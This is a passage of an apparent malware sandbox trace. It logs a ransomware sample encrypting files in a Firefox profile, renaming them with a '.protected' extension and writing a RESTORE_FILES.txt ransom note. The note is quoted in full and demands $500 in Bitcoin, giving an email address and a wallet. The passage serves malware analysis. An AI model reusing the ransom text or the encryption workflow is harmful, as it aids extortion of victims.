nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.575] CloseHandle (hObject=0x154) returned 1 [0086.575] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Windows") returned -1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Program Files") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="Program Files (x86)") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="$Recycle.bin") returned 1 [0086.575] lstrcmpiW (lpString1="startupCache", lpString2="System Volume Information") returned -1 [0086.576] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache") returned 102 [0086.576] lstrcmpW (lpString1="startupCache", lpString2=".") returned 1 [0086.576] lstrcmpW (lpString1="startupCache", lpString2="..") returned 1 [0086.576] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*") returned 104 [0086.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.577] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.577] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\.") returned 104 [0086.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.577] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\..") returned 105 [0086.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.577] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Windows") returned -1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Program Files") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="Program Files (x86)") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="$Recycle.bin") returned 1 [0086.577] lstrcmpiW (lpString1="startupCache.4.little", lpString2="System Volume Information") returned -1 [0086.577] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.577] StrStrIW (lpFirst="startupCache.4.little", lpSrch=".protected") returned 0x0 [0086.577] lstrcmpW 
(lpString1="startupCache.4.little", lpString2="RESTORE_FILES.txt") returned 1 [0086.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".txt") returned 0x0 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".rar") returned 0x0 [0086.578] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little") returned 124 [0086.578] StrStrW (lpFirst="startupCache.4.little", lpSrch=".zip") returned 0x0 [0086.578] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.588] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.588] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.589] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.589] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.597] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.598] CloseHandle (hObject=0x158) returned 1 [0086.598] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.protected") returned 134 [0086.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\startupCache.4.little.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\startupcache.4.little.protected")) returned 1 [0086.599] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: 
lpFindFileData=0x295e2f0) returned 0 [0086.599] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.599] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\RESTORE_FILES.txt") returned 120 [0086.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\startupCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\startupcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.599] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.600] lstrlenA (lpString="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") returned 684 [0086.600] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.600] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.601] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.601] CloseHandle (hObject=0x154) returned 1 [0086.601] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Windows") returned -1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Program Files") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="Program Files (x86)") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="$Recycle.bin") returned 1 [0086.601] lstrcmpiW (lpString1="thumbnails", lpString2="System Volume Information") returned 1 [0086.601] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails") returned 100 [0086.601] lstrcmpW (lpString1="thumbnails", lpString2=".") returned 1 [0086.601] lstrcmpW (lpString1="thumbnails", lpString2="..") returned 1 [0086.601] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*") returned 102 [0086.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.612] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.612] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.612] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.612] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\.") returned 102 [0086.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.613] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.613] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\..") returned 103 [0086.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.613] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Windows") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Program Files") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="Program Files (x86)") returned -1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="$Recycle.bin") returned 1 [0086.613] lstrcmpiW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="System Volume Information") returned -1 [0086.613] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.613] StrStrIW 
(lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".protected") returned 0x0 [0086.613] lstrcmpW (lpString1="4cc87c1409819bf06f42b782d4902b2f.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.613] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.613] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".txt") returned 0x0 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".rar") returned 0x0 [0086.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png") returned 137 [0086.615] StrStrW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch=".zip") returned 0x0 [0086.615] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.622] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.622] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.622] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.622] CloseHandle (hObject=0x158) returned 1 [0086.623] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected") returned 147 [0086.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\4cc87c1409819bf06f42b782d4902b2f.png.protected")) returned 1 [0086.624] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Windows") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Program Files") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="Program Files (x86)") returned -1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="$Recycle.bin") returned 1 [0086.624] lstrcmpiW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="System Volume Information") returned -1 [0086.624] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.624] StrStrIW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".protected") returned 0x0 [0086.624] lstrcmpW (lpString1="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".txt") returned 0x0 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".rar") returned 0x0 [0086.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png") returned 137 [0086.625] StrStrW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch=".zip") returned 0x0 [0086.625] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.630] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.631] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.631] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.631] WriteFile (in: 
hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.631] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.631] CloseHandle (hObject=0x158) returned 1 [0086.631] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected") returned 147 [0086.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png.protected")) returned 1 [0086.632] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Windows") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Program Files") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="Program Files (x86)") returned -1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", 
